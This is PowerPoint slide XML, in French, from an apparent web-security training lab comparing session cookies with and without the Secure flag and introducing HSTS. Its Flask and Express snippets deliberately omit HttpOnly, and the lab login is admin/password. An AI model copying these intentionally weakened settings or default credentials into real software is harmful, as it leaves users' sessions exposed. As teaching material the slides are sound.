              </a:rPr>
              <a:t>À tester maintenant  ·  …/labs/day-1/s4/safer/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="1403146" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>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537960" y="1051560"/>
            <a:ext cx="64008" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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684264" y="1234440"/>
            <a:ext cx="1147114" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hôtel, sans tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684264" y="1801368"/>
            <a:ext cx="1147114" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un voisin peut mentir sur le DNS, se faire passer pour la passerelle, vous envoyer sur SON hôte. En HTTP il lit le Cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099526" y="1051560"/>
            <a:ext cx="1403146" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F0FDF4"/>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099526" y="1051560"/>
            <a:ext cx="64008" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="16A3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45830" y="1234440"/>
            <a:ext cx="1147114" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTPS  ·  certificat OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8245830" y="1801368"/>
            <a:ext cx="1147114" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Chiffré jusqu'au vrai serveur. L'hôtel ne lit plus les headers. Il voit encore la destination. Un « continuer » sur un faux cert, et c'est fini.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9661093" y="1051560"/>
            <a:ext cx="1403146" cy="443484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9661093" y="1051560"/>
            <a:ext cx="64008" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4E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807397" y="1234440"/>
            <a:ext cx="1147114" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VPN  ·  le vrai rôle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807397" y="1801368"/>
            <a:ext cx="1147114" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le tunnel part avant, DNS compris. Le voisin ne voit qu'un blob. Plus de MITM local, plus d'hôte empoisonné.</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04 · Secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="987552"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un flag, une phrase : le navigateur le garde pour HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="170078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1005840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Secure dit au navigateur : n’envoie ce cookie que sur une connexion HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>En HTTP, le cookie reste à la maison. Pas de header Cookie. C’est tout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ça n’empêche pas de le poser. Ça empêche de le renvoyer en clair.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HttpOnly n’est pas le sujet ici. On l’a vu. Aujourd’hui : le transport.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04 · S2 vs S4</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Même login. Un flag qui change tout.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin / password des deux côtés. S4 est une copie de S2, plus Secure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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444751"/>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25880" y="148132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S2  ·  session / whoami</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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Pas de Secure. JS le lit. Le navigateur l’envoie en HTTP comme en HTTPS. Le Wi-Fi hôtel le voit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2340863"/>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05840" y="2340863"/>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325880" y="2377439"/>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S4  ·  s4_session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="259689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Secure, Domain=.dercetech.com, Path=/, SameSite=Lax. HttpOnly volontairement absent : on isole Secure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3236975"/>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1005840" y="3236975"/>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325880" y="3273551"/>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HTTP vs HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="349300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Sur HTTPS, S4 part. Sur HTTP, le navigateur le retient. S2, lui, fuit les deux.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4151375"/>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Ce n’est pas un durcissement complet. C’est une comparaison contrôlée. Un flag à la fois.</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6"/>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7"/>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8"/>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8"/>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15 min</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S2 sans Secure, S4 avec. Regardez Set-Cookie.</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training.dercetech.com  ·  labs/day-1/s4  vs  s2/unsafe</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S4  ·  cookie Secure  ·  …/labs/day-1/s4/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1810512"/>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4"/>
              </a:rPr>
              <a:t>S4 safer  ·  HTTPS  ·  …/labs/day-1/s4/safer/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2048256"/>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5"/>
              </a:rPr>
              <a:t>S2  ·  cookie nu  ·  …/labs/day-1/s2/unsafe/  ·  admin / password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2322576"/>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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2542032"/>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Même compte fictif. Un cookie différent. HttpOnly absent des deux, exprès.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2798064"/>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Clear cookie sur S4 utilise le même Domain / Path / Secure : il enlève vraiment s4_session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="305409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Le but : voir le navigateur retenir s4_session en HTTP, et l’envoyer en HTTPS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3364992"/>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Se connecter aux deux. Lire Set-Cookie. Comparer HTTP et HTTPS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4142232"/>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05840" y="4142232"/>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325880" y="4215384"/>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Login S2, puis S4. Network → Set-Cookie. Cocher la colonne Secure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4636008"/>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005840" y="4636008"/>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325880" y="4709160"/>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Application → Cookies : S2 sans Secure, S4 avec. document.cookie lit les deux (pas HttpOnly).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="512978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 y="512978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325880" y="520293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Tenter HTTP : S4 ne part pas. S2 part. C’est le flag, pas la magie.</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le flag, tel quel</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S4 pose Secure. HttpOnly, non.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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response.set_cookie(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "s4_session", token,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    secure=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    samesite="Lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    domain=".dercetech.com",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    path="/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    # httponly volontairement absent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="199339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3081527"/>
            <a:ext cx="64008" cy="199339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3154679"/>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Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="160934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response.cookie("s4_session", token, {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  secure: true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  sameSite: "lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  domain: ".dercetech.com",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  path: "/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  // httpOnly: volontairement absent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</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Domain trop large, on l’a vu. Ici on le laisse : le sujet, c’est Secure. Un flag à la fois.</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04 · HSTS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HSTS : le navigateur refuse de retomber en HTTP</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Flask  ·  after_request</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@app.after_request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def hsts(response):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    response.headers["Strict-Transport-Security"] = \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        "max-age=31536000; includeSubDomains"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return response</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Express  ·  header, ou helmet</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app.use((req, res, next) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  res.setHeader(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "Strict-Transport-Security",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "max-age=31536000; includeSubDomains",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
